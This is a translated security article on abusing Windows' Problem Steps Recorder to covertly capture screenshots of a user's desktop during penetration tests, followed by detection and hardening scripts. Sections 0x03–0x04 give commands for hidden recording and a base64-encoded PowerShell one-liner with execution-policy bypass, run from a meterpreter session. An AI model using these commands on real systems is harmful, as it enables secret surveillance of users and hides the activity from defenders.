Analysis of Windows desktop monitoring using PSR
0x00 Preface
During a penetration test, if you need to obtain more information about a host, recording the screen is more direct and effective than recording keystrokes.
Everyone may have their own implementation, but if a program built into Windows can do the job, I personally think that is clearly the preferred solution.
The following describes how to use functionality provided by Windows to implement screen monitoring.
0x01 Introduction
PSR stands for Problem Steps Recorder. WER (Windows Error Reporting) collects system error reports, but these reports often contain too little information to solve the actual problem.
To address this, Microsoft added PSR in Windows 7. It records all operations performed by the user before a crash, so that testers and developers can reproduce the environment for analysis and debugging.
While psr.exe is running, operations on the screen are recorded automatically. Each operation is saved as an image, and a zip report is generated.
Note:
Baidu Encyclopedia gives an incorrect expansion of the name PSR. The correct one is Problem Steps Recorder (a correction has been submitted).
Link:
http://baike.baidu.com/link?url=BCQtF6gpxNGulRPj-vACw_NGwZvHPcrfvn4vmx6u_JFI_OcuPJIFzY3GYE-mu91DZcB-RLiQ6pGXTki1Fc0Y6K
0x02 Usage
1. Start psr.exe and click Start Record
You can press Win+R and enter psr to start it directly.
This is the PSR control panel. Click Start Record to record the current screen activity.
After clicking this button, you will be prompted about permissions. If you need to record programs running with administrator privileges, you must run PSR with administrator privileges as well.
2. Perform any operation
Once PSR is recording, a visual effect is added to each mouse click.
3. Stop record and save report
4. View reports
The report records each operation, including mouse actions.
For example, when you click the mouse, the comment shows which operation the mouse performed.
In addition, relevant details are recorded in the second half of the report, which is also interesting:
0x03 advanced methods
When recording the screen, PSR starts its UI and adds a visual effect to every mouse click. This obviously does not meet the requirements of a penetration test.
However, PSR provides command-line parameters that allow it to record in the background.
The command line parameters are as follows:
```bash
psr.exe [/start | /stop] [/output <path>] [/sc (0|1)] [/maxsc <value>]
        [/sketch (0|1)] [/slides (0|1)] [/gui (0|1)]
        [/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)]
        [/stopevent <eventname>] [/maxlogsize <value>] [/recordpid <pid>]

/start       Start Recording. (Outputpath flag SHOULD be specified)
/stop        Stop Recording.
/sc          Capture screenshots for recorded steps.
/maxsc       Maximum number of recent screen captures.
/maxlogsize  Maximum log file size (in MB) before wrapping occurs.
/gui         Display control GUI.
/arcetl      Include raw ETW file in archive output.
/arcxml      Include MHT file in archive output.
/recordpid   Record all actions associated with given PID.
/sketch      Sketch UI if no screenshot was saved.
/slides      Create slide show HTML pages.
/output      Store output of record session in given path.
/stopevent   Event to signal after output files are generated.
```
For a practical scenario, the following commands can be used:
```bash
psr.exe /start /gui 0 /output C:\test\capture.zip
```
Starts PSR recording in the background and saves the output to C:\test\capture.zip.
```bash
psr.exe /stop
```
Stops recording and exits PSR. The report file is saved automatically.
0x04 actual test
Test environment:
Server: OS: Kali Linux, IP: 192.168.174.133
Client: OS: Win7 x86, IP: 192.168.174.128
Kali has already obtained a meterpreter session on the client.
Test function:
Recording starts automatically, runs for a specified time, then exits automatically and saves the report file.
PowerShell can be used to implement this simply:
1. Start recording automatically, with no UI, and specify the output path:
```bash
psr.exe /start /gui 0 /output C:\test\capture.zip;
```
2. Wait 10 s, i.e. the recording time is 10 s:
```bash
Start-Sleep -s 10;
```
3. Stop recording and exit automatically:
```bash
psr.exe /stop;
```
Save the code above as C:\test\1.txt, then base64-encode it.
In a PowerShell environment, run the following code to base64-encode the script (PowerShell's -EncodedCommand expects UTF-16LE, hence the Unicode encoding):
```powershell
# Get-Content returns one string per line; join them with spaces into a single command line
$string  = (Get-Content "C:\test\1.txt") -join ' '
$bytes   = [System.Text.Encoding]::Unicode.GetBytes($string)
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded
```
The output is the encoded PowerShell command:
```bash
cABzAHIALgBlAHgAZQAgAC8AcwB0AGEAcgB0ACAALwBnAHUAaQAgADAAIAAvAG8AdQB0AHAAdQB0ACAAQwA6AFwAdABlAHMAdABcAGMAYQBwAHQAdQByAGUALgB6AGkAcAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABwAHMAcgAuAGUAeABlACAALwBzAHQAbwBwADsA
```
It can then be executed directly from the meterpreter shell:
```bash
powershell -ep bypass -enc cABzAHIALgBlAHgAZQAgAC8AcwB0AGEAcgB0ACAALwBnAHUAaQAgADAAIAAvAG8AdQB0AHAAdQB0ACAAQwA6AFwAdABlAHMAdABcAGMAYQBwAHQAdQByAGUALgB6AGkAcAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABwAHMAcgAuAGUAeABlACAALwBzAHQAbwBwADsA
```
After execution, wait 10 seconds and the report file capture.zip is generated. The test is successful.
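From the defender's side, the sequence above leaves two process-creation artefacts: psr.exe launched with /start and /gui 0, and a powershell.exe command line whose -enc payload decodes (UTF-16LE base64, exactly as encoded above) to the same psr.exe command. The following detection logic is an added example, not code from the original article. It decodes encoded PowerShell arguments and flags background PSR recording; the records it runs over are constructed sample data with Image and CommandLine fields modelled on Sysmon Event ID 1 / Security 4688, not real log output.

```powershell
# Added example: decode -enc/-EncodedCommand arguments and flag hidden PSR recording.

function Expand-EncodedCommand {
    param([string]$CommandLine)
    # Match -e, -enc or -EncodedCommand followed by a base64 blob
    if ($CommandLine -match '(?i)-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') {
        try {
            $bytes = [System.Convert]::FromBase64String($Matches[2])
            return [System.Text.Encoding]::Unicode.GetString($bytes)
        } catch {
            return $null   # not valid base64; leave the command line as-is
        }
    }
    return $null
}

function Test-HiddenPsrRecording {
    param([string]$CommandLine)
    $decoded = Expand-EncodedCommand -CommandLine $CommandLine
    # Inspect both the raw command line and anything it decodes to
    $text = if ($decoded) { "$CommandLine $decoded" } else { $CommandLine }
    # psr.exe started with /start while the control GUI is suppressed (/gui 0)
    return ($text -match '(?i)\bpsr(\.exe)?\b.*/start' -and $text -match '(?i)/gui\s+0')
}

# Constructed sample records (field names modelled on Sysmon Event ID 1 / Security 4688)
$records = @(
    @{ Image = 'C:\Windows\System32\psr.exe'
       CommandLine = 'psr.exe /start /gui 0 /output C:\test\capture.zip' },
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell -ep bypass -enc cABzAHIALgBlAHgAZQAgAC8AcwB0AGEAcgB0ACAALwBnAHUAaQAgADAAIAAvAG8AdQB0AHAAdQB0ACAAQwA6AFwAdABlAHMAdABcAGMAYQBwAHQAdQByAGUALgB6AGkAcAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABwAHMAcgAuAGUAeABlACAALwBzAHQAbwBwADsA' },
    @{ Image = 'C:\Windows\System32\psr.exe'
       CommandLine = 'psr.exe' },                 # interactive launch with GUI: benign
    @{ Image = 'C:\Windows\System32\notepad.exe'
       CommandLine = 'notepad.exe C:\test\1.txt' }
)

foreach ($r in $records) {
    [pscustomobject]@{
        Image      = $r.Image
        Suspicious = Test-HiddenPsrRecording -CommandLine $r.CommandLine
        Decoded    = Expand-EncodedCommand -CommandLine $r.CommandLine
    }
}
```

Run against the constructed records, the first two are flagged (the second only because the encoded payload was decoded first) and the last two are not. In a real environment the same functions can be applied to the CommandLine field of Sysmon Event ID 1 or Security 4688 events; the /gui 0 condition is what separates the background use described in this article from a user opening PSR interactively.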
0x05 defense
This function can be disabled in either of the following ways:
1. Group Policy
Chinese system:
gpedit.msc - 管理模板 - Windows 组件 - 应用程序兼容性
Enable "关闭问题步骤记录器" (Turn off Problem Steps Recorder)
English system:
gpedit.msc - Computer Configuration - Administrative Templates - Windows Components - Application Compatibility
Enable "Turn off Problem Steps Recorder"
2. Modify the Registry
```
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]
"DisableUAR"=dword:00000001
```
Note:
DWORD = 1 corresponds to the Group Policy setting Enabled (PSR turned off)
DWORD = 0 corresponds to the Group Policy setting Disabled
Deleting the "DisableUAR" value corresponds to Not Configured
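The registry value above is the same one the Group Policy setting writes, so it can be audited and enforced directly from an elevated PowerShell session. The script below is an added example, not part of the original article; it maps the three DWORD states from the note to the three Group Policy states and sets the value if it is missing or not 1. The key path and value name are the ones given above; the function and state names are this example's own.

```powershell
# Added example: audit and enforce the "Turn off Problem Steps Recorder" policy
# via HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat\DisableUAR.
# Requires an elevated session to write to HKLM.

$PolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat'
$PolicyName = 'DisableUAR'

function Get-PsrPolicyState {
    # Returns the Group Policy state implied by the registry value:
    # 1 -> Enabled (PSR turned off), 0 -> Disabled, absent -> NotConfigured
    $item = Get-ItemProperty -Path $PolicyKey -Name $PolicyName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'NotConfigured' }
    if ($item.$PolicyName -eq 1) { return 'Enabled' }
    return 'Disabled'
}

function Set-PsrTurnedOff {
    # Creates the policy key if it does not exist and sets DisableUAR=1 (REG_DWORD)
    if (-not (Test-Path $PolicyKey)) {
        New-Item -Path $PolicyKey -Force | Out-Null
    }
    New-ItemProperty -Path $PolicyKey -Name $PolicyName `
        -PropertyType DWord -Value 1 -Force | Out-Null
    return Get-PsrPolicyState
}

"Before: $(Get-PsrPolicyState)"
if ((Get-PsrPolicyState) -ne 'Enabled') {
    "After:  $(Set-PsrTurnedOff)"
}
```

Get-PsrPolicyState alone is enough for a read-only compliance check across hosts; Set-PsrTurnedOff is idempotent, so it can be rerun safely as part of a hardening script. On a domain-joined machine the Group Policy route is preferable, since a locally written value under Policies is overwritten at the next policy refresh if the domain policy says otherwise.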
0x06 Summary
Using PSR to monitor a Windows desktop not only captures the user's desktop operations but also yields a report with many other useful details. I believe it will certainly find a use during penetration testing.